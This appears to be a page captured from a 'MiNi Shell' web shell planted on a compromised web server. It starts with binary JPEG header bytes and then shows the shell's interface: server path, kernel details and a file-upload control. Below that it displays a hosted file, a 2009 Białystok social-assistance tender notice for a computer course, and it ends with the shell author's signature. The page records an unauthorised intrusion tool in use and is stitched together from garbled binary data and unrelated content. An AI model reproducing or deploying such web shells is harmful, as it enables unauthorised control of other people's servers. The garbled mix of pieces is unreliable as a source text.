JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090602/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090602/176128-N-2009.html

<p class="kh_header"><b>Białystok: Kurs komputerowy dla beneficjentów ostatecznych projektu systemowego Aktywność kluczem do sukcesu współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 176128 - 2009; data zamieszczenia: 02.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Rodzinie w Białymstoku , ul. Malmeda 8, 15-440 Białystok, woj. podlaskie, tel. 0-85 678 31 03, faks 0-85 678 31 00.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www. mopr.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kurs komputerowy dla beneficjentów ostatecznych projektu systemowego Aktywność kluczem do sukcesu współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursu komputerowego dla 140 beneficjentów ostatecznych projektu systemowego Aktywność kluczem do sukcesu realizowanego przez Miejski Ośrodek Pomocy Rodzinie w Białymstoku, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.

2. Cel: podniesienie kwalifikacji  uczestników w zakresie sprawnego posługiwania się komputerem i Internetem oraz nabycie umiejętności wykorzystania systemów informatycznych w pracy zawodowej.

3. Zakres przedmiotowy kursu - zajęcia teoretyczno-praktyczne z zakresu:
a)obsługi systemu operacyjnego Windows - 10 godz. lekcyjnych ( 1 godzina lekcyjna = 45 minut) dla każdej grupy,
b)obsługi edytora tekstu MS Word - 15 godz. lekcyjnych dla każdej grupy,
c)obsługi arkusza kalkulacyjnego MS Exel - 10 godz. lekcyjnych dla każdej grupy,
d)komunikacji w sieci Internet - 15 godz. lekcyjnych dla każdej grupy,

4.Wykonawca zobowiązany będzie do przeprowadzenia kursu dla 7 grup dwudziestoosobowych,, łącznie minimum 350 godzin lekcyjnych, o programie dostosowanym do potrzeb i umiejętności uczestników (podstawowy, średniozaawansowany w miarę potrzeb). 

5.Miejsce przeprowadzenia kursu : teren miasta Białegostoku, 

6.Dni tygodnia w których powinny odbywać się zajęcia: wtorek - piątek, w godzinach: 8:00 - 17:00, po maksymalnie osiem godzin dziennie z zapewnieniem przynajmniej dwóch przerw na posiłek. 

7.Kurs musi być prowadzony przez wykładowców posiadających kwalifikacje i doświadczenie w prowadzeniu zajęć objętych przedmiotem zamówienia.

8.W ramach realizacji przedmiotu zamówienia Wykonawca zobowiązany będzie do:

a)organizacji kursu, tzn. zapewnienia sal szkoleniowych dostosowanych do ilości szkolonych osób, odpowiednio wyposażonych w sprzęt dydaktyczny, w tym zapewnienie każdemu uczestnikowi dostępu do samodzielnego stanowiska komputerowego w czasie zajęć,

b)zapewnienia wyżywienia uczestnikom kursu: obiad dwu daniowy + napój jeżeli zajęcia będą trwał powyżej 5 godzin dziennie; kawa, herbata, ciastka lub ciasto, woda gazowana i niegazowana,

c)zapewnienia materiałów szkoleniowych odpowiadających programowi kursu, 

d)opracowania szczegółowego programu zajęć kursu komputerowego uwzględniającego założenia pkt. 3 niniejszej specyfikacji i dostarczenie Zamawiającemu wraz ze złożoną ofertą,

e)ustalenia harmonogramu zajęć, uwzględniającego dzienny limit godzin szkolenia, tj. nie więcej niż 8 i nie mniej niż  4 godzin.

9.Koszty wynikające z realizacji zadań wymienionych w powyższym punkcie 8 obciążają Wykonawcę.

10. Wykonawca zobowiązany będzie do oznaczania pomieszczeń, w których realizowany będzie projekt oraz   materiałów szkoleniowych, materiałów informacyjnych oraz innej dokumentacji zgodnie z  Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki zamieszczanymi na stronie internetowej: www.efs.gov.pl lub www.mrr.gov.pl lub www.funduszestrukturalne.gov.pl

11. Wykonawca zobowiązany będzie do prowadzenia dokumentacji potwierdzającej realizację usługi, zgodnie z wymogami UE oraz dokumentacją PO KL, w szczególności:

a) prowadzenie dziennej listy obecności uczestników kursu (potwierdzanie obecności za pomocą własnoręcznego czytelnego podpisu), a także rejestrowania i niezwłocznego zgłaszania Zamawiającemu najpóźniej w następnym dniu wszystkich nieobecności uczestników kursu pod rygorem odmowy zapłaty za szkolenie tych osób. Wykonawca jest zobowiązany przekazać Zamawiającemu listę obecności niezwłocznie po zakończeniu kursu,

b) przeprowadzenie ankiet dotyczących oceny oraz odebranie od uczestników oświadczeń dotyczących odbioru materiałów szkoleniowych i oświadczeń o skorzystaniu z posiłków,

c)	prowadzenie dziennika zajęć zawierającego wymiar godzin i tematy zajęć,

d)	protokół z egzaminu, jeżeli został on przeprowadzony,

e)	prowadzenie rejestru  wydanych zaświadczeń.

 12. Kurs powinien zakończyć się wydaniem certyfikatu, dyplomu lub zaświadczenia o ukończeniu kursu, oznakowanych kolorowymi logotypami: Programu Operacyjnego Kapitał Ludzki, Unii Europejskiej, Europejskiego Funduszu Społecznego.
          Kopie certyfikatów, dyplomów lub zaświadczeń Wykonawca jest zobowiązany przekazać Zamawiającemu w terminie 3 dni od ukończenia kursu.

13.W ramach przedmiotu zamówienia Wykonawca zobowiązany będzie do ubezpieczenia uczestników kursu na czas trwania zajęć od następstw nieszczęśliwych wypadków powstałych w związku z uczestnictwem w w/w zajęciach według imiennej listy uczestników sporządzonej przez Zamawiającego. Przed rozpoczęciem kursu Wykonawca przekaże Zamawiającemu potwierdzoną za zgodność z oryginałem kserokopię polisy ubezpieczeniowej.

14. Dodatkowe warunki dotyczące przedmiotu zamówienia: 
a) Termin płatności: do 21 dni od daty otrzymania przez Zamawiającego faktury,

b) Nie przewiduje się wypłacania zaliczek na poczet wykonania zamówienia,

c) Wykonawca wskaże w ofercie ( oświadczenie na formularzu oferty) część zamówienia, której wykonanie zamierza powierzyć podwykonawcom. W przypadku nie wskazania części zamówienia, która ma być realizowana przez podwykonawcę Zamawiający uzna, że całość zamówienia będzie wykonywana przez Wykonawcę osobiście..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 80.53.32.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 49.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
a)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,     
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, w szczególności wymaga się od Wykonawców aby:

- wykazali i udokumentowali wykonanie, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 usługi odpowiadającej swoim rodzajem i wartością (nie mniejszej niż 20 000,00 zł brutto każda) usłudze stanowiącej przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców. Do wykazu załączyć należy dokumenty potwierdzające, że usługi te zostały wykonane należycie,

 - dysponowali: minimum 4 wykładowcami posiadającymi kwalifikacje i minimum roczne doświadczenie w zakresie objętym przedmiotem zamówienia,

b)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
c)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (art. 24 ust. 1 i 2 ustawy).

2. Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt 9 specyfikacji istotnych warunków zamówienia.

3. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. w konsorcjum). W takim przypadku ich oferta musi spełniać następujące wymagania:
a)Wykonawcy przedłożą wraz z ofertą pełnomocnictwo wszystkich stron (wymaga się solidarnej odpowiedzialności Wykonawców),
b)w odniesieniu do wymagań postawionych przez Zamawiającego, każdy z Wykonawców występujących wspólnie oddzielnie musi udokumentować, że nie podlega wykluczeniu na podstawie art. 24 ust. 1 pkt 1-9 oraz spełnia warunki określone w art. 22 Ustawy Prawo zamówień publicznych, a także składa w imieniu własnej firmy dokumenty i oświadczenia wymienione w pkt. 9.1 lit.: a,b,h specyfikacji istotnych warunków zamówienia, 
c)oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie,
d)Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika (lidera) do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia lub do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego. Umocowanie musi wynikać z treści pełnomocnictwa. Uwaga: treść pełnomocnictwa powinna dokładnie określać zakres umocowania,
e)wypełniając formularz oferty, jak również inne dokumenty powołujące się na Wykonawcę; w miejscu np. nazwa i adres Wykonawcy należy wpisać dane dotyczące wszystkich Wykonawców występujących wspólnie.
Uwaga: wszelka korespondencja dokonywane będą wyłącznie z pełnomocnikiem (liderem)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia spełnienia warunków udziału w postępowaniu Wykonawcy mają dostarczyć:
a) aktualny odpisu z właściwego rejestru lub zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, [wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert],
b) oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu, określone w art. 22 ust.1 ustawy,  oraz że nie podlega wykluczeniu z postępowania na podstawie art. 24  ustawy - załącznik nr 2 do specyfikacji istotnych warunków zamówienia,
c) wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 usługi odpowiadającej swoim rodzajem i wartością (nie mniejszej niż 20 000,00 zł brutto każda ) usłudze stanowiącej przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców. Do wykazu załączyć należy dokumenty potwierdzające, że usługi te zostały wykonane należycie - załącznik nr 3 do specyfikacji istotnych warunków zamówienia, 

d) wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności - załącznik nr 4 do specyfikacji istotnych warunków zamówienia, 
e) pisemne zobowiązania innych podmiotów do udostępniania osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa pkt d, Wykonawca wskazał osoby, którymi będzie dysponował,

Zamawiający wymaga także dołączenia do oferty:
f) wypełnionego druku formularza oferty stanowiącego załącznik nr 1 do specyfikacji istotnych warunków zamówienia
g) pełnomocnictwa podmiotów występujących wspólnie (np. konsorcjum),
h) stosownego pełnomocnictwo, jeżeli upoważnienie do złożenia oferty nie wynika z dokumentów wymienionych w punkcie 9.1. lit. a) niniejszej specyfikacji,
i) szczegółowego programu kursu uwzględniającego założenia pkt. 3 specyfikacji - opis przedmiotu zamówienia oraz  zakres przedmiotu zamówienia.

2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium RP, zamiast dokumentów, o których mowa w punkcie 1 lit.a, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto wobec niego likwidacji ani nie ogłoszono upadłości, nie orzeczono wobec niego zakazu ubiegania się o zamówienie, nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne, albo że uzyskał przewidziane prawem zwolnienie, odroczeniem lub rozłożenie na raty zaległych płatności lub wstrzymane w całości wykonania decyzji właściwego organu. 
Dokument, o których mowa w punkcie 8.2. lit.a, powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Dokumenty sporządzone w języku obcym należy złożyć wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.

3. Dokumenty mogą być składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub upełnomocnionego przedstawiciela Wykonawcy. W przypadku złożenia dokumentu w formie kopii każda strona dokumentu musi być opatrzona klauzulą: Za zgodność z oryginałem.
Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.
4. Brak jakiegokolwiek z wyżej wymienionych dokumentów spowoduje wykluczenie Wykonawcy z postępowania, z zastrzeżeniem art. 26 ust. 3 ustawy.

Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił. Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania a ofertę uznaje się za odrzuconą..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www. mopr.bialystok.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia Wykonawcy mogą też otrzymać bezpłatnie, na wniosek, w terminie 5 dni w siedzibie Zamawiającego, 15-440 Białystok, ul. Malmeda 8..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2009 godzina 11:45, miejsce: siedzib Zamawiającego - sekretariat, 15-440 Białystok, ul. Malmeda 8..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com